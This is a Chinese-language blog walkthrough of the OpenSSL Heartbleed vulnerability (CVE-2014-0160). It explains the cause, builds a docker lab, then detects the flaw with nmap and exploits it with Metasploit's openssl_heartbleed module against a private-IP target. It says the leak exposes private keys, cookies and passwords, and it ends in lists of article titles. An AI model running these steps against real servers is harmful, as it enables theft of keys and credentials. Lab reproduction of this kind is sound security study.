0x00 漏洞介绍

是一个出现在加密程序库OpenSSL的安全漏洞,该程序错误属于缓冲区过读,即可以读取的数据比应该允许读取的还多

0x01 漏洞成因

由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露

0x02 影响范围

OpenSSL1.0.1版本

0x03 环境搭建

使用docker一键搭建环境

docker-compose build
docker-compose up -d
docker-compose ps



环境搭建完成后,访问http://192.168.220.134,测试环境是否搭建成功
http://192.168.220.134/

0x04 漏洞复现

使用nmap检测“心脏出血”漏洞是否存在,指定端口号为443

nmap -sV -p 443 --script ssl-heartbleed.nse 192.168.220.134


使用msf对漏洞进行利用,查找heartbleed模块

msf5 > search heartbleed


使用第一个选项,设置主机IP地址、端口号,设置verbosetrue以便于显示泄露的信息

msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > show options
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set RHOSTS 192.168.220.134
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set RPOST 443
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > exploit



漏洞利用成功后可以抓取到信息,包括服务器的私钥、用户的cookie、密码等

CVE-2014-0160:心脏出血(心血)漏洞相关推荐

  1. 心脏出血(Heartbleed)漏洞浅析、复现

    一.漏洞介绍 心脏出血(英语:Heartbleed),也简称为心血漏洞,是一个出现在加密程序库OpenSSL的安全漏洞,该程序库广泛用于实现互联网的传输层安全(TLS)协议.它于2012年被引入了软件 ...

  2. Openssl“心脏出血”漏洞分析及其利用

    一.openssl漏洞形成原因 4月7日,互联网安全协议OpenSSL被曝存在一个十分严重的安全漏洞.在黑客社区,它被命名为"心脏出血",表明网络上出现了"致命内伤&qu ...

  3. 关于“心脏出血”漏洞(heartbleed)的理解

    前阵子"心脏出血"刚发生的时候读了下源代码,给出了自己觉得比较清楚的理解. -------------------------穿越时空的分割线------------------- ...

  4. 渗透测试-Openssl心脏出血漏洞复现

    心脏滴血 早在2014年,互联网安全协议OpenSSL被曝存在一个十分严重的安全漏洞.在黑客社区,它被命名为"心脏出血",表明网络上出现了"致命内伤".利用该漏 ...

  5. Heartbleed心脏出血漏洞原理分析

    1. 概述    OpenSSL在实现TLS和DTLS的心跳处理逻辑时,存在编码缺陷.OpenSSL的心跳处理逻辑没有检测心跳包中的长度字段是否和后续的数据字段相符合,攻击者可以利用这一点,构造异常的 ...

  6. openssl(CVE-2014-0160)心脏出血漏洞复现

    目录 #漏洞简介 #漏洞原理 #漏洞检测 #漏洞利用 #漏洞简介 心脏出血是openssl库中的一个内存漏洞,攻击者利用这个漏洞可以服务到目标进程内存信息,如其他人的cookie等敏感信息. Hear ...

  7. Heartbleed心脏出血漏洞靶场搭建

    1. 简介    OpenSSL心脏出血漏洞原理是OpenSSL引入心跳(heartbeat)机制来维持TLS链接的长期存在,心跳机制作为TLS的扩展实现,但在代码中包括TLS(TCP)和DTLS(U ...

  8. OpenSSL心脏出血漏洞

    当用户使用类似于Facebook或Gmail等用户认为安全的网站发送信息时,对端计算机需要了解另一端的计算机是否仍然在线,所以他们会发出一个被称为"心脏跳动"(Heartbeat) ...

  9. 安全漏洞“心脏出血”继续 原因是“丘比特”

    虽然距离OpenSSL爆出心脏出血漏洞(heartbleed)已过去了有一段时间,但这个漏洞的影响却远没有结束.葡萄牙的安全研究人员发布的一份报告显示,同样的漏洞可以在WiFi传输过程中重演,攻击者可 ...

最新文章

  1. 金智教育CTO:大数据人才培养要先行一步
  2. 【FPGA】FIFO的Verilog设计之同步FIFO的设计
  3. ACM之常见的(C++版)问题解析
  4. Intent 传递对象
  5. c#window服务程序
  6. excel只对筛选后的结果单独用公式
  7. 【oracle】多个用户的对象 导出导入
  8. RuoYi-Cloud 进阶篇_01( Seata 单机环境搭建)
  9. Spring Boot html页面解析之jsoup
  10. Unity超基础学习笔记(四)
  11. 如何在 Mac 上合并 PDF?
  12. 大数据时代亟需消除八大“疑云”
  13. 基于混合策略改进的樽海鞘群算法
  14. 学生信息管理系统(java)
  15. 微信禁止模拟器登录怎么办?
  16. html中hidden属性小案例
  17. 设置OpenWrt连接外网
  18. Pycharm:注释、删除所有注释
  19. linux基础知识ppt下载,《Linux基础知识》PPT课件.ppt
  20. 可微可导连续可积的关系

热门文章

  1. 上海市政府颁布《上海市居住证申办实施细则》
  2. 英飞凌微控制器,驱动物联网的关键“大脑”
  3. ARM发布 Cortex-M35P保护物联网智能连接
  4. mysql 多个主码_数据库中几个基本概念 主码 外码
  5. 20190831每日一句 超越你的舒适区,突破自我,继续前进!
  6. 鸿蒙系统能超过ios多少年,未来3年,鸿蒙系统能与iOS系统媲美吗,能否超越iOS系统?...
  7. Wireshark使用技巧之GeoIP显示IP地理位置及经纬度信息
  8. SLAM算法资料收集
  9. phpMyAdmin无法缓存模板文件,所以会运行缓慢。
  10. Centos | 一招解决所有 ImportError: xxx: cannot open shared object file